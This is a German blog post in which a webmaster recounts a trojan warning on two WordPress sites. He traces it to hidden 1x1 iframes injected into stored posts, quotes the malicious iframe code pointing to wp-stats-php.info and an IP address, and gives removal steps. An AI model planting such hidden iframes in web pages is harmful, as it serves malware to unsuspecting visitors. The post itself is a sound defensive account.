Trojaner-Warnungen können Nerven, Zeit und Kopfschmerzen kosten. Auf den von mir verwalteten WordPress-Blogs http://fv-bakum.de und http://feuerwehr-bakum.de schlich sich böser Code ein. Beide laufen auf einem auf einem 1&1-Webspace installierten WordPress-System. Besucher sprachen mich immer wieder darauf an, dass ein Trojaner auf meinen Seiten wäre.
Es handelte sich um den Trojaner „TR/Dldr.HTML.Agent.IS“. Falls Ihr Antivirenprogramm beim Besuch einer Internetseite alarmiert hat, benachrichtigen Sie bitte den Webmaster mit einem Hinweis auf diese Seite. Wie Sie als Webmaster diesen Trojaner aus Ihrem Blog entfernen können, erfahren Sie unten am Ende des Beitrags.
Ich konnte mir dies gar nicht denken, aber weil sich diese Warnungen häuften, beschloss ich der Sache auf den Grund zu gehen. Da ich aus Sicherheitsgründen immer mit dem Firefox-Browser von einem eingeschränkten Nutzerkonto aus ins Internet gehe, hat mich mein Antivirenprogramm Antivir nie vor einem gefährlichen Trojaner gewarnt. Anscheinend mag der den Firefox nicht.
Ich erkundigte zunächst mich im WordPress-Deutschland-Forum. Dort waren die Reaktionen erst ratlos. Ein Trojaner habe man nicht auf meinen Seiten gefunden. Einer fand aber dann doch eine solch gefährliche Warnung. Anscheinend surfen die Spezis in diesem Forum wohl auch nicht mit dem Internet Explorer.
Nun wechselte ich in das Administrationskonto und rief mit dem Internet Explorer 7 beide Seiten auf. Leider ist dies ja immer noch der übliche und ziemliche unsichere Weg des Normalnutzers von Computern in das Internet. Und sofort warnte mich Antivir: Das „Trojanische Pferd TR/Dldr.HTML.Agent.IS“ verlangte den Zugriff auf meinen Rechner. Zur großen Darstellung der Warnung …
Ich hatte bereits Stunden verwandt, um alle Dateien meiner WordPress-Installationen (mit den dazu notwendigen Datensicherungen) auszutauschen. Jedoch war dies erfolglos. Der Trojaner wollte nicht weichen. Nach einigen Rückfragen im WordPressforum stellte sich heraus: Ein böser Code wurde einfach mit einem Verweis auf eine Script-Datei in meinen Beiträgen eingebettet, mit der anscheinend dieser Trojaner in fremde Rechner geschleust wird:
<iframe src=“http://www.wp-stats-php.info/iframe/wp-stats.php“ frameborder=“0″ height=“1″ width=“1″></iframe> oder
<!– Traffic Statistics –> <iframe src=“http://61.155.8.157/iframe/wp-stats.php“ frameborder=“0″ height=“1″ width=“1″></iframe> <!– End Traffic Statistics –>
Wenn man diesen Quellcode liest glaubt man, es handle sich um eine Statistikfunktion von WordPress. Doch da irrt man gewaltig. Die Domains wp-stats-php.info bzw. http://61.155.8.157 sind in China registriert. Beim Aufruf eines derart infizierten Beitrags wundert man sich, dass die Ladezeit erheblich verlängert wird. In der Statuszeile des Browsers erscheint „wp-stats …info“. Da dies so ähnlich aussieht wie eine interne WordPress-Funktion, schöpft man nicht so schnell Verdacht, dass in diesem Moment ein Trojaner von einer chinesischen Quelle aus dem Rechner eingeschleust wird.
Ein einfacher Blick in den Seitenquelltext eines Beitrags reicht aus, diesen schädlichen Code in den Beiträgen sofort zu entdecken. Selbstverständlich habe ich die „infizierten“ Beiträge sofort entfernt. Bei einem Update der WordPress-Installation werden die Beiträge nicht geändert. Deshalb konnte der schädliche Code beim Auswechseln der WordPress-Dateien auch nicht beseitigt werden sondern nur, indem man die betroffenen Beiträge entfernt.
Der Code versteckt sich im HTML-Code eines Beitrags, welcher nach Erzeugung durch das WordPress-Script in der mysql-Datenbank abgelegt und gespeichert wird. Wird der Beitrag aus der Datenbank abgefragt, wird auch wieder der in der Datenbank abgelegte böswillige und für den normalen Nutzer nicht sichtbare Code im Beitrag hinzugefügt. Der Code versteckt sich also in der Datenbank und nicht direkt in den Script-Dateien von WordPress.
Das gleiche Problem ist übrigens nicht nur bei WordPress-Blogs sondern auch bei Homepages, die mit Joomla verwaltet werden, aufgetreten.
Nur was soll man jetzt noch machen? Wo ist die Sicherheitslücke? Wie kommt dieser böse Quelltext in mein Blog? Wie kann man verhindern, das dieser Code sich so einfach in ein WordPress-Blog schleichen kann? Ich habe alle Dateien der Installation getauscht, meinen Rechner mit dem Antivirenprogramm Antivir gescannt. Nun weiß ich auch nicht, was ich sonst noch so tun kann.
Um den „Trojaner“ aus Ihrem Blog zu löschen, rufen Sie mit Ihrem Browser die Seiten mit Ihren Beiträgen auf. Bei den WordPress-Blogs sind dies standartmäßig die Startseite und bei vielen Beiträgen die weiter gelinkten Fortsetzungsseiten. Nun müssen Sie sich den Quelltext dieser Seite ansehen. Klicken Sie dazu mit der rechten Maustaste auf die Seite und wählen Sie „Quellcode anzeigen“ aus. Der Quellcode wird angezeigt. Schauen Sie nach, in welchem Beitrag der Quellcode
<iframe src=“http://www.wp-stats-php.info/iframe/wp-stats.php“ frameborder=“0″ height=“1″ width=“1″></iframe>“ oder ähnlich, z.B.:
<!– Traffic Statistics –> <iframe src=“http://61.155.8.157/iframe/wp-stats.php“ frameborder=“0″ height=“1″ width=“1″></iframe> <!– End Traffic Statistics –>
vorhanden ist. Melden Sie sich jetzt in Ihren Blog an und löschen Sie den betreffenden Beitrag aus Ihrem Blog. Alternativ können Sie auch nur den böswilligen Code aus dem HTML-Code des befallenen Beitrag entfernen, wenn sie den Beitrag nicht löschen möchten. Damit haben Sie den Code gelöscht, über den der Trojaner in Ihr Blog eindringt. Für die Folgen bei Anwendung dieses Hinweises übernimmt der Verfasser keinerlei Haftung.
Update 04.04.2009: Die Sicherheitslücke scheint nicht im WordPress-Skript sondern im FTP:-Protokoll zu liegen. Mit FTP lädt man die Skript-Dateien auf den Server. Anscheinend ist es für die Hacker möglich, den Zugang zu einem Server zu knacken, wenn er das Zugangsasswort herausfindet. Dann kann jede Datei auf dem Webserver manipuliert werden. Dies berichtet Florian Flegel in seinem Beitrag Wer braucht ein AntiVirus-Plugin für WordPress?
Diese Erklärung ist sehr plausibel, zugleich ist dies der Gau des Internets. Denn dann ist jede Website, die auf einem lokalen Webserver gespeichert wird, potentiell manipulierbar. Ich musste diese unangenehme Erfahrung auch bei HTML-Homepages machen. In den Seiten wurde einfach schädlicher Code eingefügt. Es ist mir immer nach schleierhaft, wie die Angreifer die FTP-Zugangspasswörter, die aus reinen Buchstaben/Zahlenkombinationen bestanden, „errieten“. Flegels Rat zum Schließen dieser Lücke sind „sichere FTP-Passwörter“.
Demnach müssten die drei Passwörter des FTP- Zugangs, der MyQsl-Datenbank und des Zugangs zu WordPress „sicher“ geändert werden, um das System „virendicht zu machen“. Webmaster aller Länder, wechselt Eure Passwörter! Ist dies wirklich der Schlüssel zum Erfolg?
Immer mehr Leute, wie zum Beispiel auch ich, verschicken ihre „Briefe“ elektronisch per Email. Und gehen damit oft ziemlich sorglos um. Denn unterwegs passiert eine Email viele Rechner, über die Emailadressen und Informationen gesammelt werden können.
Nicht nur der Handel, sondern auch Tageszeitungen leiden darunter, dass durch den Internethandel immer mehr Kunden verloren gehen. Die 
